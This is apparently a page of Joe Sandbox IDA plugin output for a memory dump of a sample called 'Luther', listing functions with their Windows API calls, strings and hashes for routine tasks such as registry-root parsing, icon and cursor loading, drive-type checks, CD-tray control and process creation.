COLLAPSE, xrefs: 00EC159D, 00EC15B8
GETTOTALCOUNT, xrefs: 00EC148E, 00EC14B3
EXISTS, xrefs: 00EC1618, 00EC1633
GETTEXT, xrefs: 00EC1733
GETSELECTED, xrefs: 00EC16EA
UNCHECK, xrefs: 00EC17DA

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: ab09b02d9034d3393164e18413d5c1de6174e43299077f6d0ec0e791a332a9ce
Instruction ID: 91fe44c45dfc26a692dcc86548747119751a70512cf0110f933a210c9c19a307
Opcode Fuzzy Hash: ab09b02d9034d3393164e18413d5c1de6174e43299077f6d0ec0e791a332a9ce
Instruction Fuzzy Hash: 99E1A1316083018FCB14DF24C651A6AB7E2BF95314F14699DF896B73A2CB32ED46CB81

Function 00EBD3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBC10E,?,?), ref: 00EBD415
_wcslen.LIBCMT ref: 00EBD451
_wcslen.LIBCMT ref: 00EBD4C8
_wcslen.LIBCMT ref: 00EBD4FE
_wcslen.LIBCMT ref: 00EBD559
_wcslen.LIBCMT ref: 00EBD58F
_wcslen.LIBCMT ref: 00EBD5DF

Strings

HKEY_USERS, xrefs: 00EBD63F
HKEY_CURRENT_USER, xrefs: 00EBD61D
HKCU, xrefs: 00EBD62E
HKEY_CLASSES_ROOT, xrefs: 00EBD553, 00EBD558
HKU, xrefs: 00EBD650
HKCC, xrefs: 00EBD60C
HKEY_CURRENT_CONFIG, xrefs: 00EBD5D9, 00EBD5DE
HKLM, xrefs: 00EBD4F8, 00EBD4FD
HKEY_LOCAL_MACHINE, xrefs: 00EBD4C2, 00EBD4C7
HKCR, xrefs: 00EBD589, 00EBD58E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 8957cfb937175315e26fb90b862dabbe76dd79995688e5b421d81b511f65e4be
Instruction ID: a89f26a5b26922c8f18fa98a1235dae3422c051ed512f5162e0315a05942e362
Opcode Fuzzy Hash: 8957cfb937175315e26fb90b862dabbe76dd79995688e5b421d81b511f65e4be
Instruction Fuzzy Hash: ED71077260811A8BCB209E7CCE416FB33A1ABA075CB253125FD66F7294FA31DD45C3A0

Function 00EC8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00EC8DB5
_wcslen.LIBCMT ref: 00EC8DC9
_wcslen.LIBCMT ref: 00EC8DEC
_wcslen.LIBCMT ref: 00EC8E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EC8E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00EC6691), ref: 00EC8EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EC8EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EC8F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EC8F5C
FreeLibrary.KERNEL32(?), ref: 00EC8F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EC8F78
DestroyIcon.USER32(?,?,?,?,?,00EC6691), ref: 00EC8F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EC8FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EC8FB0

Strings

.exe, xrefs: 00EC8DE3
.dll, xrefs: 00EC8E06
.icl, xrefs: 00EC8DC3

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 9c357bf06727928637fbb504665ce4fcf18a7bc82cab9975526f3e4f025928b8
Instruction ID: 901a504f4adb532915539834a069fe22c7451533c103a995c7a42770e013395e
Opcode Fuzzy Hash: 9c357bf06727928637fbb504665ce4fcf18a7bc82cab9975526f3e4f025928b8
Instruction Fuzzy Hash: FC612571600208BEEB14DF64CE45FBE77A8BF08B15F10551AF915F61D0DB72A986CBA0

Function 00EA48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00EA493D
_wcslen.LIBCMT ref: 00EA4948
_wcslen.LIBCMT ref: 00EA499F
_wcslen.LIBCMT ref: 00EA49DD
GetDriveTypeW.KERNEL32(?), ref: 00EA4A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EA4A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EA4A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EA4ACC

Strings

type cdaudio alias cd wait, xrefs: 00EA4A46
set cd door , xrefs: 00EA4A6D
wait, xrefs: 00EA4A89
open, xrefs: 00EA4999, 00EA499E
close, xrefs: 00EA4943, 00EA495D
closed, xrefs: 00EA494D, 00EA4972, 00EA498B, 00EA49C3, 00EA49DC
open , xrefs: 00EA4A2A
close cd wait, xrefs: 00EA4AB7

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 752b9bfb91106ee804d2dbd28eb9f0f8fa1f7a72cb65965da4222f824e9f3f78
Instruction ID: f528216ca87ae56b093e4baf21e9841a4222668c850133a8937368e7db16c548
Opcode Fuzzy Hash: 752b9bfb91106ee804d2dbd28eb9f0f8fa1f7a72cb65965da4222f824e9f3f78
Instruction Fuzzy Hash: B571BFB25082069FC310EF24C84196BBBE4EFD9758F00692DF895AB291EB71ED45CB91

Function 00E96382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00E96395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E963A7
SetWindowTextW.USER32(?,?), ref: 00E963BE
GetDlgItem.USER32(?,000003EA), ref: 00E963D3
SetWindowTextW.USER32(00000000,?), ref: 00E963D9
GetDlgItem.USER32(?,000003E9), ref: 00E963E9
SetWindowTextW.USER32(00000000,?), ref: 00E963EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E96410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E9642A
GetWindowRect.USER32(?,?), ref: 00E96433
_wcslen.LIBCMT ref: 00E9649A
SetWindowTextW.USER32(?,?), ref: 00E964D6
GetDesktopWindow.USER32 ref: 00E964DC
GetWindowRect.USER32(00000000), ref: 00E964E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E9653A
GetClientRect.USER32(?,?), ref: 00E96547
PostMessageW.USER32(?,00000005,00000000,?), ref: 00E9656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E96596

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 3c16f6acb7aa98cf902e34afaa439668c6d82a445ded3155fbf90a883a3fcb48
Instruction ID: 780b008b37c7d49bb9e8fd1e448b0e4ca4799de13e789adad740c15b7e104787
Opcode Fuzzy Hash: 3c16f6acb7aa98cf902e34afaa439668c6d82a445ded3155fbf90a883a3fcb48
Instruction Fuzzy Hash: 15718C31900609AFDF20DFA9CE45EAEBBF5FF48708F100929E596B25A0D776E944CB50

Function 00EB086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00EB0884
LoadCursorW.USER32(00000000,00007F8A), ref: 00EB088F
LoadCursorW.USER32(00000000,00007F00), ref: 00EB089A
LoadCursorW.USER32(00000000,00007F03), ref: 00EB08A5
LoadCursorW.USER32(00000000,00007F8B), ref: 00EB08B0
LoadCursorW.USER32(00000000,00007F01), ref: 00EB08BB
LoadCursorW.USER32(00000000,00007F81), ref: 00EB08C6
LoadCursorW.USER32(00000000,00007F88), ref: 00EB08D1
LoadCursorW.USER32(00000000,00007F80), ref: 00EB08DC
LoadCursorW.USER32(00000000,00007F86), ref: 00EB08E7
LoadCursorW.USER32(00000000,00007F83), ref: 00EB08F2
LoadCursorW.USER32(00000000,00007F85), ref: 00EB08FD
LoadCursorW.USER32(00000000,00007F82), ref: 00EB0908
LoadCursorW.USER32(00000000,00007F84), ref: 00EB0913
LoadCursorW.USER32(00000000,00007F04), ref: 00EB091E
LoadCursorW.USER32(00000000,00007F02), ref: 00EB0929
GetCursorInfo.USER32(?), ref: 00EB0939
GetLastError.KERNEL32 ref: 00EB097B

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: f387e205a5cb04b78eab1e60be2e030aaaa79391bfb97752f4b12670c621fe44
Instruction ID: 7de75ad0e28587974d9372e917d2c2d004a78912e07fc03d8ce9116b3aabdefc
Opcode Fuzzy Hash: f387e205a5cb04b78eab1e60be2e030aaaa79391bfb97752f4b12670c621fe44
Instruction Fuzzy Hash: 604151B0D083196ADB109FBA8C89C6FBFE8FF44754B50452AE118F7291DA78A801CF91

Function 00E93A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E93AD9
_wcslen.LIBCMT ref: 00E93B44

Strings

k, xrefs: 00E93CE6
INSTANCE, xrefs: 00E93D9F
REGEXPCLASS, xrefs: 00E93BA1, 00E93BB2
NAME, xrefs: 00E93C81, 00E93C92
CLASSNN, xrefs: 00E93B3F, 00E93B50
CLASS, xrefs: 00E93AD4, 00E93AF1
TEXT, xrefs: 00E93DC8

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k
API String ID: 176396367-2171760788
Opcode ID: 3603728a95f48794b1e7c77a9e899fe35919b000997598381c80a82bd9d9367f
Instruction ID: 71db48dc16fe006dbb143db5a9e5671b2b27728693f4216b12569aa85163f99f
Opcode Fuzzy Hash: 3603728a95f48794b1e7c77a9e899fe35919b000997598381c80a82bd9d9367f
Instruction Fuzzy Hash: 66E1D332A00616ABCF189FB4C8516EDFBB5BF54714F106129E956F7250EB30AE89C790

Function 00E50436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00E50436

Part of subcall function 00E5045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00F0170C,00000FA0,2D966EDC,?,?,?,?,00E72733,000000FF), ref: 00E5048C
Part of subcall function 00E5045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00E72733,000000FF), ref: 00E50497
Part of subcall function 00E5045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00E72733,000000FF), ref: 00E504A8
Part of subcall function 00E5045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E504BE
Part of subcall function 00E5045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E504CC
Part of subcall function 00E5045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E504DA
Part of subcall function 00E5045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E50505
Part of subcall function 00E5045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E50510

___scrt_fastfail.LIBCMT ref: 00E50457

Part of subcall function 00E50413: __onexit.LIBCMT ref: 00E50419

Strings

InitializeConditionVariable, xrefs: 00E504B8
WakeAllConditionVariable, xrefs: 00E504D2
SleepConditionVariableCS, xrefs: 00E504C4
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E50492
kernel32.dll, xrefs: 00E504A3

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 09965c148f37e64e4cc04833c2b584498feb2037ecd6da8a514d180ed2057ab5
Instruction ID: 805f6df182f47aeb03dca8478d5d6a30a898ea3e491b5b62a2a98696d4b77de9
Opcode Fuzzy Hash: 09965c148f37e64e4cc04833c2b584498feb2037ecd6da8a514d180ed2057ab5
Instruction Fuzzy Hash: 81213532A497046FD7216FA4AC06FA977D5EF04B63F04193AFD05F3280EB728C0A8A51

Function 00EA4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00ECDCD0), ref: 00EA4F6C
_wcslen.LIBCMT ref: 00EA4F80
_wcslen.LIBCMT ref: 00EA4FDE
_wcslen.LIBCMT ref: 00EA5039
_wcslen.LIBCMT ref: 00EA5084
_wcslen.LIBCMT ref: 00EA50EC

Part of subcall function 00E4FD52: _wcslen.LIBCMT ref: 00E4FD5D

GetDriveTypeW.KERNEL32(?,00EF7C10,00000061), ref: 00EA5188

Strings

removable, xrefs: 00EA502F, 00EA5034
ramdisk, xrefs: 00EA5136
all, xrefs: 00EA4F76, 00EA4F7B
fixed, xrefs: 00EA507A, 00EA507F
unknown, xrefs: 00EA514D
cdrom, xrefs: 00EA4FD4, 00EA4FD9
network, xrefs: 00EA50E2, 00EA50E7

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 447549b8d9bc854bcb67ea1dca8c0852088a1641ca24273a0eec9e144deb46d2
Instruction ID: 67dded7b9c7c3b2aeb8724ba10fa7b734f36afc99a5a785e1eac86beee10549e
Opcode Fuzzy Hash: 447549b8d9bc854bcb67ea1dca8c0852088a1641ca24273a0eec9e144deb46d2
Instruction Fuzzy Hash: EDB107726087029FC310DF28C890A7AB7E5BFAA718F50691DF596AB291D770E844C792

Function 00EBBA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00EBBBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBBC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBBC34
_wcslen.LIBCMT ref: 00EBBC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBBC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBBC96
_wcslen.LIBCMT ref: 00EBBD92

Part of subcall function 00EA0F4E: GetStdHandle.KERNEL32(000000F6), ref: 00EA0F6D

_wcslen.LIBCMT ref: 00EBBDAB
_wcslen.LIBCMT ref: 00EBBDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EBBE16
GetLastError.KERNEL32(00000000), ref: 00EBBE67
CloseHandle.KERNEL32(?), ref: 00EBBE99
CloseHandle.KERNEL32(00000000), ref: 00EBBEAA
CloseHandle.KERNEL32(00000000), ref: 00EBBEBC
CloseHandle.KERNEL32(00000000), ref: 00EBBECE
CloseHandle.KERNEL32(?), ref: 00EBBF43

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 3bfd15624449fa9baa0f0e8569799c6d6f5ca674865ffff931d4429dca49f28f
Instruction ID: 78ea74db8474a37dc2a6a8e29e78517cb6e5a988c058b48f9bb87034e7fa35dd
Opcode Fuzzy Hash: 3bfd15624449fa9baa0f0e8569799c6d6f5ca674865ffff931d4429dca49f28f
Instruction Fuzzy Hash: BCF1CE716083409FC714EF24C995BABBBE1BF84314F14995DF885AB2A2CBB1EC45CB52

Function 00EB4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00ECDCD0), ref: 00EB4B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EB4B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00ECDCD0), ref: 00EB4B4F
FreeLibrary.KERNEL32(00000000,?,00ECDCD0), ref: 00EB4B9B
StringFromGUID2.OLE32(?,?,00000028,?,00ECDCD0), ref: 00EB4C05
SysFreeString.OLEAUT32(00000009), ref: 00EB4CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EB4D25
SysFreeString.OLEAUT32(?), ref: 00EB4D4F

Strings

kernel32.dll, xrefs: 00EB4B13
GetModuleHandleExW, xrefs: 00EB4B24

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: ad97b1c74f4160b47f67a3dd52a8bc4041635d251504e91956d891b850527e60
Instruction ID: 5e5f44dfe51085e2c1e6b0050c0eb1ed253c2e347911c6ce913de59098fb784c
Opcode Fuzzy Hash: ad97b1c74f4160b47f67a3dd52a8bc4041635d251504e91956d891b850527e60
Instruction Fuzzy Hash: 0C121CB1A00115EFDB15DF94C884EEEBBB5FF45318F149098E905AB292D731ED46CBA0

Function 00E3381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00F029C0), ref: 00E73F72
GetMenuItemCount.USER32(00F029C0), ref: 00E74022
GetCursorPos.USER32(?), ref: 00E74066
SetForegroundWindow.USER32(00000000), ref: 00E7406F
TrackPopupMenuEx.USER32(00F029C0,00000000,?,00000000,00000000,00000000), ref: 00E74082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E7408E

Strings

0, xrefs: 00E3382D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: a642570404ba0b17cac7cac1999ae1c9d1feed52b918cc25ca97c33f0c796086
Instruction ID: 4e5d9ef297353376eedfb2907207a53b75a7330bc21ab5b0f6785b87e1071891
Opcode Fuzzy Hash: a642570404ba0b17cac7cac1999ae1c9d1feed52b918cc25ca97c33f0c796086
Instruction Fuzzy Hash: 1F711530604205BEEB259F39DC49FEABFA4FF04368F205216F628B61D1C7B2A910D751

Function 00EC7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00EC7823

Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EC7897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EC78B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC78CC
DestroyWindow.USER32(?), ref: 00EC78ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E30000,00000000), ref: 00EC791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC7935
GetDesktopWindow.USER32 ref: 00EC794E
GetWindowRect.USER32(00000000), ref: 00EC7955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EC796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EC7985

Part of subcall function 00E32234: GetWindowLongW.USER32(?,000000EB), ref: 00E32242

Strings

0, xrefs: 00EC77D0
tooltips_class32, xrefs: 00EC7890, 00EC7915

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
